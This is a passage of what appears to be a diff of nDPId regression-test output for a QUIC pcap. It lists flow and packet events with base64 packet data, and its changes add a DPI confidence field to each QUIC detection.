+VpWWL9e3bLpDjurtDY1UVq7\/zyqXdPda+dj4dfpiumFbn95kie6gTbq0Ka77SOEVLy4F0R2VJz0mF6y8BHF7y+\/LWrLPikezYLBu3wp4yKo5ZMD+1RhjR0eYSiFStCQDoyh1ZzHLZrZgvvFV+EGsEUegku5d6U\/1xaEg70OUXkUj8MuVqNGP\/DVAWz6hGuIclLJHMXkZa1w4sqgXxuwiLhqmwpSjmxq15zo0Z6Ez9\/3O8teBesxAzKjLPt8Sjolvyd5nkwqOheF9hPlho5\/02ZAOHIA3HyHiqD0gFnqO5U5vPI269ren0HJGp9Y0aGm+Qy9oejwYJQfgaxeUOqcA7NVscX+RDbbgM1ZMcwzqUnM9YjlXsn6y6NTYw1rNff1zxlhQ08vVArWM2OumIoI++kTKQEg4JkAXQ3sxDPGAMMWQm14xHh1lESh4xPo3UHq2rynANu5+mkgpLsBsJIGzZOygMCZkmyp2fh7iY52BUb4Nx03epPzl6T\/HG2GNWULvucC8GPWEvPtkSLn35wNxlzF8NXX5lfbR6AqMs5QTbFYMg5BCH46iFuJgeJdSeBSv2NIL6sAH5f5tl5FrSe6SEykjojnE+KA8Pu32tMRLNHQvsRLkoRsuGCZmn0vJNgxR0Qj2ZnmdeI9WNinCOb\/TQqf05ttvs0B8SkG2JbukXe8IPAXK8CE2z3vwPoWYB2uzq10A+1l82xFsU23TRP69q5AjAR5gcBo2onzoy0h+\/Fh3MjRkS2rWgW2gbyo49\/6o+6I9tCoTl8e+t8H5Hr7OKKf7UKw0\/fDzsw6vvWL7Z180IeAQRORtYOnhVfjSCcEhIA8M4QlGvZG+XDbkn0clOXH6LrYUiHVBMh0b7ARqcsGvnK0HqjBlCVzGLKSDZa9icKkesJuZEIs2gxlcPU4atpOweh\/JejTvw0JRDflvusFCZ8LggbOTt4dNGmwJ7Mbm0OCxLaIc0U9h9Ubab5kq6QWk6OCd0h\/j2UBY7LZFZszsTdUnL22e1bgg4XWpAYp7qn"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431301735,"flow_last_seen":1621431301735,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431301735,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":53431,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431301735,"flow_last_seen":1621431301735,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431301735,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":53431,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1621431301808,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431301808,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFJpAAH4RYWKokEAFgPgYAdC3AbsFTrrvzP8AAB0I1Sc982lv31UAAEU0zeT7R306i0MUyYVVPZIk\/KZWGL6jbpzbn0wPmz3fvD9vdn3cNYtKf4Qtet1U\/nGKiDokhhMmX3\/BVLzQQyqFmb\/M8TdFlsBDC0dAZ5ykvarKqbUTSTgiy95Q6LfVZMqkeHJMsDpJptTPVl7gjw06GKLx5TW5G91hLE1FqeLb\/dNBqxaEBgwW7oSUsitPRczOioi+LEcRagKP4t5qnZ8aDmpfz8FLrvCECdKPswENLWuAf9Vmj\/tnC4GhgFxsu0TzsfmUVaQeeSZw9PR7DmOen7ZDKqiRf3DrGbxH8xiO73GPBoBDQjgENrZosMzfCGZE\/MTUgNw05SO8IzaGjJfPHze+4QhEnPM020WOHSfwtq28RMPlwJJF02yo3wlT\/NJAKohp0A5KX75ENMuJSkJLQaSqe0zoJ0tVJo5191cibx8Sz62pctFEM4BebxdU+RpZo0LdowaXCq1sachUxpRRHMdssDm0qblyaHts6qPgulEBH7aEgucpskAryrCvygwocC7svHgVLBmM\/+xK0IluLWY+kqgiVSTrV8WnG+1L5QgeJxSFASdp6Ns0TgD8Il7BJ8o5ajit3BypcmDF3DPrrI+Qx7QiBRmTSSPFFvm0GF3n7i0EkY2Hm8DzbT3wnL2YHAkVv9zggjYvZo1n1LI739jXkeIRrfAzGVeEvRFZmvKb1OdgKztEkV0hoFvvBdOHeKuCUUz4hKnv2+\/lYocOo+kRXiezYBrj7PqFapYBg0p2eH\/igSHIYxfLy7ikKIGXi4rRNmWXUqjcq4WUp8XDBW4tb+Z90I\/+mhDOTUok1Nigx2G\/7KbfM22h\/apHLFvkn9EIt06RDs3B76xXAur0AM2Ip6AMuYDnxYolFxG2K3ctE2xC1DRz7n0lKt3HhiR\/P5zOKCm0DfhmASldwBhjifKegO2oN9vU7M0DdrAxP\/JNcYjpWs+ie2MFdu2lsdJOex3XTLsfX1fJC8LBGXc1sOTG8uWnisGATLFKyNfzBcvv5C\/U2hjtcTGAngc3itVAnAbl+4hQ9s3hUMWsUk8+RJ0zRwPQbX2nZmyIhql2s6FpohxHCq5UoWxXh22BLb0zwRAvo6A759ODMT15ISyiIq\/u6XtqcB6tFsY4SDCIUFZLCzn8LY8hNbxKnIvT+kZgjTz2dylh0rVAxuhuUhpxNkpru0GmszDQWJ+1v76Pi\/R7HWIGyiEs+YivcWX8jXFsjBB8QfSitgQCCwYnJt4tNaulx0t7\/KVoJPhMWx2cAxrfacv8GgasdSu65cuLmWAlMC9W3slT8e4g0\/tto\/lATo46xcKpYU+fjCGriKRqNQMloM3kkzYIDJ3SwWWEk\/P3rFXpQXMr\/b1crw62J6Glt4mO9QzYLHGzgKwu\/euJxbE+eJO1ae7IMc4NRHHR85ltAKeR8XgoQo5N68sqCn2+MBEpQtbXHWnBMQz2HW6tkMHrohxRM8\/o23cHXLk1EsRmSry6aPgKepAtHk5rhQZjUer1NzID\/c8S0mu1iEEhSc4CLtwDa95xWQxcI5HMEDAcxxwRU\/MIaLOsI\/5mt+17GR+up2thq6thFHPVXAw+joWJg2Ed0ILpT3Tut1YgVVqZwcLTcnwOfBYMiG85DaaijQFB0dttNIqmW221\/RwD0coicDTwZyNZ\/VM3mnoVjqC6Lpsnt0MQaGsPhgoIU69TDIf9rzi7vHvOjiyWK40BX3xDHBVCSUpf7QS+RYWcOrXrADOELfOVIriZ9QMjQ4fxzn65DpF0UVgcyVId7aKLIvC4Qfz3"}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431305591,"flow_last_seen":1621431305591,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431305591,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"121.209.126.161","src_port":50482,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1621431305591,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431305591,"pkt":"AAAAAAAAAAEATej1CABFAAViY2BAAH4RsyKokEAFedF+ocUyAbsFTqiTwf8AAB0IW3iwt+y2cooAAEU0BEmji8W\/r6QQo738TO7y5dSuNAh8prkXOpfADst+Jc9Q9tTb4UI0vRbpsBAc\/wRyLzFYUecQ317zmJMLzTZl8Jd3ZiRr7yYjKX37LDNWlAoicKC4oliOH\/Fml25DnlNIMC5nvpDkdC5bMRw90FXK08RrmaBrmDz8JlipdUNPgq6+Ks9KDpvkjFtGyj5dpZ3gMuMYJ\/WogIBs3JzPpqngAdy\/QWH\/r\/vNVwYPPIH7tiEsC65BQyTkA7HqsyJkff7L\/WpxQokdQkBU8i8+seczGsyXRW\/ZJe3L2iHzkGEklOIcNZo10nU0am\/+mFv9bszZ1gDimSJ88GZcWsSJNfq+Q47ZVtA8nRSUIxcfLFnXeJPf6PU\/rb3+S0qU3oZcpaHV6agh8jvjdO0w\/VOq8qxpuNAX4LkLt40P2U151YrBr5x\/OeUgR+Z6s3QT73\/HzfP90bJE2S0skEBr+RDQY13GKYZklk5d8PV2Kpo38KXeuKakskZ5wi2woJvrGxrjC6dy\/btETblhn8osDCW539k50fXlOVrNB4tYZhdBrjJHSlXfbwhprDerXi32Hb5v8GxP+TWGbi0qBKv5xhEw3E7lsExoF4hu7AxtupA6MXdD\/\/f6nsoiLIb502HAdNTho568FOnbHatxotovMfok8tB77tKCpaP0enN8SDSqa1eXr3phlwvrsB1N8IyoHeHhPDB3mlqSTzZyp2hhDwIOLk5l9eNXb4xHGzjApfQLHaY0en\/gogDLaQeVjuQnQc70f+A2ywlWAXdLkP2C9LVdtL1r7vtwucagunaQbNYFe4w7n642v6LRQNiKSvAkNFxBJOicXbTdkburmROhEgL56f1Q93ZrU9KAY9ux7cXUbSz2tjxs8Qa6wJIeIr1x2JPW2pY3ylGZZDYZAu7yqS63SBDTa0WDJ2YdAWunIZm+DAVfhjaZtAj4eI4w6uPQAjhrCoPjKrLErXzuqx7sXAJFQxO2A4zcoit4huJuMpqzdY1UgUeAgie\/SSepMph5oCom4eMvOEKwkc5QonRZdyIpiAxa3aAdkn30E8RE6dtdPGch4nRH6Z6peyUQ\/xzAePd1pt+2lyuSFBwrXLkpjjk2T63ijkoMVykG1jIHqTL6VbWyhP4hLLhnznJc2v\/BPjkdBh0PPpuMO1BZZkopd7nuoNr7BIQeDS6PbzpyxT4WKDIasLmDyHw\/yGw\/r8T2HaOKcScYHVbxhlOhwg6vkVvTNtbDIUTpL+GcmTWQxz0+awTxBntBHWW2XF+QqtpquB3MGHkRjBzMGrwtChsrY5glPcwPNrPPPLFMguiPMSM5jSzWBWTIU1NciHn8dCkbmPwG75IN6zA3mioUEB3Ek98007I\/5so2LorUnz3QUpb09VXFeljvTD2\/ONwYANmDdDPP3pM62BtSycqNiX2CbGC5Vyjl2JuRWiIOpVgN4mTK6bkJK0Yc2Tt\/hfALU39E0hCz98Xsbk9g25C347kmDI+6o5J5KOTGciKIBmxTx0XS39uDAuhpOwuMMZXpcx4Vf04JfLuiNBot7rciv\/jQgEJAvfOFnFnTy\/cjvf8Z72bMe3Clm4eVyPKPxVWWCFWN4MZIPXhStwfxp7L9YCMfW5\/oi9I+Q5eaFQyvJaVOOHoLaBbG2DcrLP0Wl9HuaY\/B4CRtnuzBzHGKGio7n5DsFpRrH7tc6ky4QWHp5YEC+gVU3FroThHyBQkDCWRmOzPOImY6RD6ATpJNX1fGD3U1V12VcoYmjJM+eh+pvzZzfI2d57bkQ+g\/9Ch7"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431305591,"flow_last_seen":1621431305591,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431305591,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"121.209.126.161","src_port":50482,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431305591,"flow_last_seen":1621431305591,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431305591,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"121.209.126.161","src_port":50482,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431307075,"flow_last_seen":1621431307075,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431307075,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"158.146.215.30","src_port":62652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1621431307075,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431307075,"pkt":"AAAAAAAAAAEA00bUCABFAAVijzpAAH4RCgqokEAFnpLXHvS8AbsFTmfYwf8AAB0IMX0JnIww67UAAEU0WXLvZGE+Afr+idrQ20zR+TEoH4qe7FkehtVpAee47RFYupCIo0eg\/DcR8TUJutvknKHjy6Va8WSvM1EWCYimGhVvNrQ+Fp0wmM+yyFY35rO08kD00xrPXP1H4Fk1Ofd1UfnQJk89eBBrRrAgNIIZzsqrTA2YPMgSp4UwmAVHJRtVJBMno66qsQpB5MQvisi+MDZENkGh9aq9g0sgJGWK095wFoEHqSie1cZEJH0NF7S9OLvFWBFqkCvegn2Nbgv1X3v0U4FwZWypfbJWLFwEnbR3285EnVWxHk\/SMMkHZmF0On1dQwUg3Qj0eZgGpqJ+FXEKe4uYJaEDgW57O4nU+0rSjJ3XzXQlfhw\/N4zTyFc0pjNRVcZvLiMXSfY4zYW3s6AIQlPy9VOM0+Sd2IN1gmmyrlJylMJVvj5QnrEWhimJh+zZEQruzz2mkSk8RFBjfgmsnANxoo9pkoo1TS97QkqmEvwlZfg6yosepp9RK65\/6peOS8TJ315KsHvbCu5MVzH5I4uEAg3ATybL0\/q2fjNpY\/e5kXcbiGD0xrzms9EN4h9y46YS0qZtRxTb54e2+c\/tkGE9oXd6ejJH7up2JrHyebJzWgY7y1\/4vmipy3uHgTNouauHpshSLQuocj\/IVA+m8M+S\/vIZxEEN5HxEShVKdzz3MydKf3IeaXIEkOogNU0EAfQF+FNMB1pAv4kA3D\/lhiw4mNTz7Pn2czcGqAoVM9Tb+FIl0v4naUGL2XsyFHEd0pdrvK0kyagKybt4WV5sy5dTFsU8oIYAkaDi0C0uvM\/hkA5rmYfgUGBRK7JNxcGRlB1h0fO7BcK++y+yfMx3k+B1cK7ObenTJrzFdENU9FiKc1npqAEG6qvPQ0489f2iKZpGKUe0BeleNnG8VKEEH4oM7w1ZPNdb6xC7Ch9EIMjjHN\/cAXUVd2BiR8doMWSeLNhCQrg5YRmEpmom8\/\/QGV8iDszvv8hWt\/MyXIyygAe9+QVeN26ZFXxatsAZKhRgqeS9+v7iRbNhTv\/yp28d0NIRzYLEysp\/VKAJSY\/PxvxR6eYrq0gk8M6gyt\/4BK1ZsK1h+llwW9nD\/t+dSlwau5F0J9hNHyoTUxT3\/2rWXx1WBqmNf7tT6HVASdYqI51YLphC\/t4BsXjG1U2fCZdns7t3a7Bu9FrBapBq8ozxlEwnaYBf9iuXer9XDB+ZQgwar2qMLM45G4ilP6GA0RkrpFDMK\/tSM78ey1CFRzLoD7+UjYyTIDcNhz56WZW\/cCCxyuopmvh2HuMiOaBDLX0ZH5LorqUuKLVpyJEcSbWHqdDvEIC2OQcfgQk4oVo+j3e1KvcgwqJTHG1uKoIKEu0XzvPdTW0gMnxGMRrPwDFCo77mU+Wk7zWBWHmjHLet1\/dYxkU8+0PHq4hWTvyi2WvPZLluvohq\/uVh5PNNj2h1VQCyJSuGN4gUneosa8Kp16gjYZ9wlLexOQBxfrtdOZHNANUy9BWZE48pGmjMCVwkfj5AoR+lwxIH1PbYVdSg1W6n2FrEJeYRs9EjR5zk5Ib8sLvbIBr0bkcLFp09zWWWvyzA5kGStYwmIoFVfVK1M8DAb6EOkQ\/RECglK66h9GO4PSBtbey5+Whbs8ZQwqwshqhdGjb\/1OCebCFnJxT4b25yYHn79Vu70lJgCSdcmKtbvBQodyXcJt1eGqpdLpKIO+Eplu9mc1YnLPgFA\/NdEhN2SwFoPGLdsaCDBDsYWHvxDTBH03HR3HVl7PSSq9lVQAnF9xjB0hUGCVyMcbzWm4Fj"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431307075,"flow_last_seen":1621431307075,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431307075,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"158.146.215.30","src_port":62652,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431307075,"flow_last_seen":1621431307075,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431307075,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"158.146.215.30","src_port":62652,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00623{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431309055,"flow_last_seen":1621431309055,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431309055,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":63136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1621431309055,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431309055,"pkt":"AAAAAAAAAAEAS1QMCABFAAViW5hAAH4RACCokEAFCUGp\/PagAbsFTk75zP8AAB0IoJxBQBoX7TgAAEU0UJzG+bCyeSlhjmh9OGyP80hWwr1IV5nm+47YLijEK3KQr7gE9aToyGrLFbSZbr\/ot\/\/NhrLMkx5w9hUXpB6saN0FW9GivaLO3QW6nH3CEbSTx0vN4IWlz\/JYiJgSRdKp5yiIMpfFGjzOrzdapK0tDb+uDfZlGSI6b4fOTqadVuIZa7Vvz80YKtnFc+CKsIoEHyG+RVKlu8E7nUsvdaU1zjAfOXguC2O447Mq4l4iIuNZPa3X4qwTb1oBJViD2q6N5mxCHocUwd5IC1Czt\/KzM8ZvYZiaIu37vHuF4pEg0uyFIwWyEK0I3dICXfUy0FAthUUXOSQ\/qAjh83pIDqDmLm2oIH2HOI5yuYZbg4RhR2LcjLBI6jzxoT8wFqrBDURuZdJcnHFDl0KIt+h53s1VG0ioJi9EFRahccLL15Ih+xhJfJizq7Pj4ctwKdbyHsA9jLbn7BGdV2gCwR8YorYeGvatXhw3zhkfV39Cwpeuujb2aCauSV78zlMabBFL4I8dN4braPEQxADv6t882wA3cfqZmbZ60uGkg8o\/gGbldbBIsa\/FRs5yHZAy3QpgKNCZfgBmMgS7eLFSJs6rcXTEaMTPDLwpJJgNTV5uiX2tJSaIJYr3pSISnTR89Gx0X3HmUn\/Ja6T0TIlgJKfs7TsyV3\/O+pj\/KvUyMCLdWAd6hc3OeA+YtszQ9IkT0t3IpA1OTS8L7ZNGDMrpzcZ49\/um9SKUYcvskuDPhaNggUksgvTJNkykAOEaY25imLNje+fio\/CgCrOEzLgy9G+NM0WtOHSe3sLkVdRGEAlB8ruk5vv2PFS6ZLA25T0hhIjNffnQm3+PTFk9kp5zihC0fqEooPgerPJ+8+JYctFK\/gLWRbc6OMvqllIpSOsFv+DIs2hi7N22XRUDShPiuab421vCGIiM7eiQl2FqR1tqIihAoVLym23eHpBpBbJFceMhPtBiXoKcb55LGt9SppKd+KwhSDGVu3bTJZszb6XgDMccDIvwEjkETVY7jOTOHyZT0drrSCyhKYmxWWJw9iI7nyCGfm19D9sxHMXlftbXZVq2QywR0n8Tcly1vSGHvWdt6+A1Ohb0q9GI+TDf1MnPjKVMbc2Kjk4sa1bJ8BlYl2eeag5iJ6VyYM+GwJgezWvXmBp3qA2zBEXJQaqQ9yhweRmQybXzLdvwRU9OJ\/DC+vNSBAa8gMAK9mY5Yzv1YBeC909GfAlJvGCjI8JOls25+LbiBJQ85Ab9s9IytjWrn\/cyj3XQ4p1l6hp+Q080riZKDTXmNwz+ZUmSDeZjTgPQUatAzktduFtFx07hplZWmV+lNMIP2zDrs9dhGgepus2\/ERahVwFr5jRDchF2jCx5cqTiE9CwuAwI4ztSewXM+keDsmAAoGV8qicjKAmokyTujz8Pt0ubuL7Zo3\/+EwH0Fu0yqTI0PlfkDAxftdvubX0DwkPEL1Ys1JczkA5o2okvwzloGIRmG\/5p2ZLhuCcIfTMkB5hPFgkXmWE8bNKCsiCijKcxlJE58T\/Bs7KO99VWovYSh7XujacQIsrOWD4ngpsxQOnWzWHNI6Hz9zoCr3iAZfUtemo08nKkjt3hmmff6D2iPsNJUeEJV+R5NWzGfh4YokledF0c+qgfcyMCt23zpaXdET5Xlf0TYwS3j7a7j5hWdjf+2+Cp25Y643N5nVwFZXgmHCtXCbP\/TIPT+qvhoV6jTaL+\/rIu0EzVrFyk1QmNvT1Yr01Lyy4C0Uugxd3xMMGXt8WcXVXvtz\/2H0LnL9UTOZ0L"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431309055,"flow_last_seen":1621431309055,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431309055,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":63136,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431309055,"flow_last_seen":1621431309055,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431309055,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":63136,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431355629,"flow_last_seen":1621431355629,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431355629,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":51456,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1621431355629,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431355629,"pkt":"AAAAAAAAAAEAaACzCABFAAVipRBAAH4RM2+okEAFZsLPs8kAAbsFTgz5x\/8AAB0Ipr6cuikmNEMAAEU0i0hH+cAdz5ZZK\/xgszII4NJ+Cs\/TRSxsD\/59bGzAHONnn6j+X3amElYhYMo+go49s13dC+nlDHUdymxgbgfhGCJjdyT9TzcGgD1HhFldjuPuqaUqb2U+e5hIm7ZwKR4IiSdw5myr6wLeQGKnRWRznbKdv0\/S8qhtnacEzUWkRbgLNZB6UrIuIb3\/XF61ze+uu1oQFMqs\/98rtD2Gush\/bOd4PCp75DHjTM7vEePRlMktunxdIh3uhOzgWNKSQKJT0NAyTU7NxzeiF3GfRej2\/kZ85CVwTrCrF16rxPwjm9ETk7onwTP2SJN9jSLLXtE8HLoGNVYKwKhEtDy7juZS+ZzakAkwGM40iWULaV8JHp3tnl4HFGHlYIam6j9\/x\/pkFvR97oZ4wzOV8R3kk4Ra7CeuS8G446n4JShwKYpq8P1sEbgLA0Q+fIXUmPEN7zq\/oW\/SjwuvXJSpkHba6nxwXOq9T2kwGi2sisBu9OUPhX+jksGDs7ufRR3uLnbqZloU9ve7ujWkOVy8l0mz6YekjKqsAnkn1AHXrNbiuNq3lfNWMOdFJMSCZVvRNOSxLp0vTEGoqQhPMALOnaZWkaB\/IYt22cFqUAekqyAVUEGfqiGt6h9rCpzV8lGyjNf1CoZnWFNQvZHRcUd0E0mwSijEO\/8qx\/3uH7V1emFiAJLB37Dab2xZnuNuUQ5y+bJoqPPXPlpeEf9N2vgb4V1z5g\/MMBLG41lXjcqJeJWiZvymJ1H3KCTyAX75xQGo9dFLeD8l8p7GaWhBKf6VVbpWbM2nvE4+lRC2IaGF4F5M+5QC4RODSGaHlCcroOJfhkPdPiQrLTk\/7S0AiJhOEEoxKs5rmjMJWHbOhMEmV2Uqjkwlipc94JjyYJ2kxfN3X0UT\/S4dmpbMytDlXm2P3piCB\/MLrm+e9saulhmLDTxI5H7sCO9NK8mugUOQqCu4A60KTwRUiaJW97RDku8KM7tNRUwdkA7m4N6y8rHQhIH4ocpzig55LxPWT5XZqJmtqcBDZzFQl61yCq0MRPJez5meDXJITVqsdC8fAKML2\/9BBA6p2fme6P1rzQPoj+L2OOAcsG1lD15uPkM7J4XMlnbWRKz5t+5U5cCLF\/FyZV6ikFZeMEUbfhZVFVez5O0b7ArQykKFskvw5ow0nPTWFs3RhbSkruVVy+CP7T20ld2Zoo3waO1CAhdyywLs+WjgaBeB6BJYKM6gxS4fW8wzOgcaq4G2GqkD3m4pZqaaELLxGOxDCmCzO0QCG9M6jpfPOKsOfPc5ynpr4aPju6JGtl\/z+IPQNUX6dMyprmtEVvzlezA5hXv1FOS9Bu3pJnoRf0c1aYbjlC2uFltDff+w4\/xv44mcnP49XC51ZyX8YG\/WwlTNT+Q+PSx8mlKvW7CnX5u232hGz8LR+K7zeWVVpOleSv30hmVlH6Y4OuVkNecB2PlodVO